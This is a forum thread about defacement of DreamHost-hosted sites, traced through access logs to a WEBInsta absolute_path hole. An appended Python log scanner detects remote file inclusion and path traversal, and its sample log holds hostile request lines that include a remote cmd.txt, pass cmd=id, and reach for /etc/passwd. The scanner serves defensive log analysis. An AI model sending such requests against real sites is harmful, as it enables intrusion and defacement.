Security report #998997 over 24 hours old


#1

I have submitted a detailed report to DH support outlining the defacing of many of my DH hosted sites via a server exploit. 24+ hours later, no response. With no other means of contacting them, I am posting here in hopes that it will spark a response.

report request #998997


#2

Mind if I ask what the server exploit was? Just wondering if it really was a server exploit because I would think that a lot more would’ve happened beyond simply defacing a web page.


#3

On seven of my ten domains, the index.html or index.php pages’ code was replaced by “RootBox Owns Your Box”. Nothing else was touched. I am the only one with the password to my sites (changed frequently, and of course, changed immediately after the problem was discovered). I only use SSH/SFTP to access the sites, and I only use one of two machines, both of which only I have physical access to. Googling around, I found this link…

http://translate.google.com/translate?hl=en&sl=es&u=http://rumy.blogcindario.com/2005/02/00026.html&prev=/search?q=ownz+rootbox&hl=en&lr=&sa=G

It could very well be the exploit in question, or it could be a coincidence. It’s possible that I did something to make my sites vulnerable to attack/exploit, but I cannot see how/where. Short of a reply from DH support, I can only guess. Presumably, DH support could look into the issue and tell me what happened, how it happened, who was to blame, and whether or not it is an issue. You’d think that a security issue is something they would be interested in determining the seriousness of in a timely manner.


#4

Most likely a PHP script you’re running; phpBB and AWStats are a few recently hard-hit scripts.

jason


#5

Seconding jason, but with not much more to go on: if you have either older, unpatched phpBB or AWStats installed on your domains, you are vulnerable to a variety of SQL exploits (Santy worm, injections, etc.). What PHP scripts are you using? If they are third party, you should probably check out the user forums for those scripts; you will find info about exploits, patching, and restoration hints at those boards. If they are home-made scripts, you might want to check out PHP security forums.

If mod_security is not enabled on your domains, turn it on; it should help prevent most future attacks.

Good luck getting everything back in order. I also doubt this was a server-wide issue because if it was, there would be a lot more noise on this board if many users were affected. :wink:


#6

They got back to me, although about 30 hours later :frowning: . DH claim it’s not a server exploit, and I believe them. But they instead say that it is a CMS PHP script I’m using, Geeklog. Oddly, they said “the security expert said it is a vulnerability in Geeklog and that you should update to the newest version”. Well, I have the newest version installed, 1.3.11, and configured properly. There is no noise about Geeklog 1.3.11 having any security problems, so I’m still at a loss. I have no AWStats or phpBB running anywhere, and mod_security is enabled on all domains. So, I’m back to crossing my fingers that I don’t get hit again. I’ll continue to search through my sites for a vulnerability. I wish DH could supply me the access logs for the time period in question; that would help me determine what the intruders may have done.


#7

You can access the access log yourself. Just FTP into your domain, then check out the logs directory.

-Matttail


#8

We have seen a LOT of security exploits on websites like this in the past couple of months. We try to investigate every one of them but most of our support staff are not qualified to do a thorough investigation and the people who are capable of doing it are quite busy.

The majority of these break-ins are due to unpatched software that we have previously made announcements about. In those cases it’s hard for us to commit too much time since we have already done what we can to protect the site before the break-in. It sounds like that may not be the case here, however.

I generally include the problematic URL or query string that was used to crack the website when I send people reports of security holes. I’ll try to get everyone else to do that as well so you have more information to go on.

Dallas
DreamHost Honcho

#9

Oh man, I never knew they were there. Really silly of me. Off to check the logs…

Ok, checked them. It turns out there’s a security hole in the mailing list manager software I had on one of my sites… WEBInsta ( http://www.webinsta.com ) that has an absolute_path vulnerability. Found it, patched it, and now I’m more secure.

Fun learning experience.
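Posts #7 and #9 are the useful part of this thread: the access log in the domain's logs directory recorded the request that abused the script, and reading it is what located the hole. As an added example that is not part of the original thread, the Python script below parses Apache combined-format access log lines and flags the query-parameter patterns that commonly precede this kind of PHP-script defacement. The log lines are constructed, the paths, file names and IP addresses are invented, and the absolute_path parameter name is taken from post #9; the thread does not say what that WEBInsta hole actually does, so treating a URL-valued parameter as a remote file inclusion attempt is an assumption, not a description of the real bug.

```python
"""Scan Apache combined-format access log lines for request patterns that
typically precede a PHP-script defacement: remote file inclusion (a parameter
whose value is a URL), a watched parameter name, and path traversal.
Added example; the log lines below are constructed, not real data."""
import re
from urllib.parse import urlsplit, parse_qsl

# One combined-format line: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# A parameter value that is itself a URL is the classic remote-include probe.
URL_VALUE = re.compile(r'^\s*(https?|ftp)://', re.IGNORECASE)

# Parameter names worth flagging regardless of value. "absolute_path" is the
# name given in post #9; add others from vendor advisories as needed.
WATCH_PARAMS = {"absolute_path"}

# Constructed sample log (documentation IP ranges, made-up paths).
SAMPLE_LOG = """\
192.0.2.10 - - [12/May/2005:03:14:07 -0700] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.9 - - [12/May/2005:03:15:30 -0700] "GET /index.php?page=about HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
198.51.100.7 - - [12/May/2005:03:20:11 -0700] "GET /lists/include.php?absolute_path=http://203.0.113.5/cmd.txt? HTTP/1.0" 200 312 "-" "Mozilla/4.0"
198.51.100.7 - - [12/May/2005:03:20:12 -0700] "GET /lists/include.php?absolute_path=http%3A%2F%2F203.0.113.5%2Fcmd.txt%3F&cmd=id HTTP/1.0" 200 640 "-" "Mozilla/4.0"
198.51.100.7 - - [12/May/2005:03:22:45 -0700] "GET /gallery/view.php?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.0" 404 210 "-" "Mozilla/4.0"
"""


def parse_line(line):
    """Return the named fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_params(target):
    """Return (reason, name, value) for every query parameter that looks hostile.

    parse_qsl percent-decodes values, so encoded ``http%3A%2F%2F`` and ``..%2F``
    are caught the same way as their plain forms.
    """
    findings = []
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name in WATCH_PARAMS:
            findings.append(("watched parameter", name, value))
        if URL_VALUE.match(value):
            findings.append(("remote file inclusion", name, value))
        if "../" in value or "..\\" in value:
            findings.append(("path traversal", name, value))
    return findings


def scan(log_text):
    """Return one record per log line that carries at least one finding."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        findings = suspicious_params(rec["target"])
        if findings:
            hits.append({
                "ip": rec["ip"], "time": rec["time"], "status": rec["status"],
                "target": rec["target"], "findings": findings,
            })
    return hits


def attacker_ips(hits):
    """Distinct source addresses behind the flagged requests, for a block list."""
    return sorted({h["ip"] for h in hits})


if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f'{h["time"]} {h["ip"]} {h["status"]} {h["target"]}')
        for reason, name, value in h["findings"]:
            print(f"    {reason}: {name}={value!r}")
    print("sources:", attacker_ips(scan(SAMPLE_LOG)))
```

Run it against a real file with `scan(open("access.log").read())`. A 200 status on a flagged request is the line to worry about: it means the script accepted the parameter, which is exactly the case the thread's final post describes. Double-encoded payloads (`%252E%252E%252F`) are not decoded by a single parse and would need a second decoding pass.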